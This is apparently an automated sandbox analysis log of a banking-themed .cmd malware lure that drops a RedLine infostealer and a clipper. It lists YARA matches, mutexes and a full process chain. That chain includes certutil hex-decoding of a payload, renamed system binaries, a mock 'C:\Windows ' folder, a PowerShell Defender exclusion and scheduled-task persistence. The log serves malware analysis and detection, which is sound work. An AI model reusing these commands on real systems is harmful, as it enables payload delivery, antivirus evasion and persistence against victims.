                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1434A589_2_00007FF7F1434A58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C6A849_2_00007FF7F13C6A84
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CEA7C9_2_00007FF7F13CEA7C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1414A409_2_00007FF7F1414A40
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A69849_2_00007FF7F13A6984
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13989909_2_00007FF7F1398990
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13429409_2_00007FF7F1342940
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141A9F09_2_00007FF7F141A9F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13AE9F09_2_00007FF7F13AE9F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A09EC9_2_00007FF7F13A09EC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CAA009_2_00007FF7F13CAA00
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1418C589_2_00007FF7F1418C58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F144CC8C9_2_00007FF7F144CC8C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BCC809_2_00007FF7F13BCC80
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1390C289_2_00007FF7F1390C28
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1438CF49_2_00007FF7F1438CF4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1358D009_2_00007FF7F1358D00
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D2CF89_2_00007FF7F13D2CF8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139CD109_2_00007FF7F139CD10
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13DCCA89_2_00007FF7F13DCCA8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1364B689_2_00007FF7F1364B68
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F6B949_2_00007FF7F13F6B94
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1394B309_2_00007FF7F1394B30
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F138CBFC9_2_00007FF7F138CBFC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F134AC089_2_00007FF7F134AC08
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B8BD49_2_00007FF7F13B8BD4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1424E589_2_00007FF7F1424E58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1346EF49_2_00007FF7F1346EF4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1428EAC9_2_00007FF7F1428EAC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137EED49_2_00007FF7F137EED4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1422D6C9_2_00007FF7F1422D6C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B6D7C9_2_00007FF7F13B6D7C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A2D189_2_00007FF7F13A2D18
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1398D2C9_2_00007FF7F1398D2C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136EDA49_2_00007FF7F136EDA4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F138107C9_2_00007FF7F138107C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139D0949_2_00007FF7F139D094
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13410309_2_00007FF7F1341030
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F135B09C9_2_00007FF7F135B09C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E4F949_2_00007FF7F13E4F94
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1374F909_2_00007FF7F1374F90
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1368F1C9_2_00007FF7F1368F1C
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA20C415_2_02EA20C4
                    Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF7D1523448 appears 36 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F13FABFC appears 818 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F144F1B8 appears 183 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F144F11C appears 37 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F13DEB98 appears 93 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F14564A6 appears 173 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F1407BAC appears 34 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F137BC9C appears 280 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F134D1C8 appears 41 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F1407D70 appears 35 times
                    Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7F1400D10 appears 181 times
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02EA46D4 appears 244 times
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02EB894C appears 56 times
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02EB89D0 appears 45 times
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02EA44DC appears 74 times
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02EA4500 appears 33 times
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02EA4860 appears 949 times
                    Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                    Source: 47.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 47.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 32.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 32.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: armsvc.exe.31.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: alg.exe.32.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: AppVClient.exe.32.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: DiagnosticsHub.StandardCollector.Service.exe.32.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: FXSSVC.exe.32.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: armsvc.exe.31.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: alg.exe.32.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: AppVClient.exe.32.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: DiagnosticsHub.StandardCollector.Service.exe.32.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: FXSSVC.exe.32.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: 32.3.Native_neworigin.exe.89ece0.17.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 32.3.Native_neworigin.exe.89ece0.17.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 32.3.Native_neworigin.exe.89ece0.17.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.spre.bank.troj.spyw.evad.winCMD@66/168@302/23
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15132B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,4_2_00007FF7D15132B0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F142826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,9_2_00007FF7F142826C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D153FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,4_2_00007FF7D153FB54
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1389220 VariantInit,#358,#359,SafeArrayCreate,SafeArrayPutElement,VariantClear,SafeArrayPutElement,VariantClear,CoCreateInstance,#357,VariantClear,SafeArrayDestroy,SysFreeString,9_2_00007FF7F1389220
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1453148 FindResourceExW,LoadResource,9_2_00007FF7F1453148
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-6465d78f7f049fe99e7986a9-b
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1832:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-6465d78f7f049fe9-inf
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1268:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
                    Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-6465d78f7f049fe99ea72c54-b
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdReversingLabs: Detection: 13%
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
                    Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                    Source: unknownProcess created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIFJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
                    Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "Jump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /oJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pifJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: unknown unknown
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: unknown unknown
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
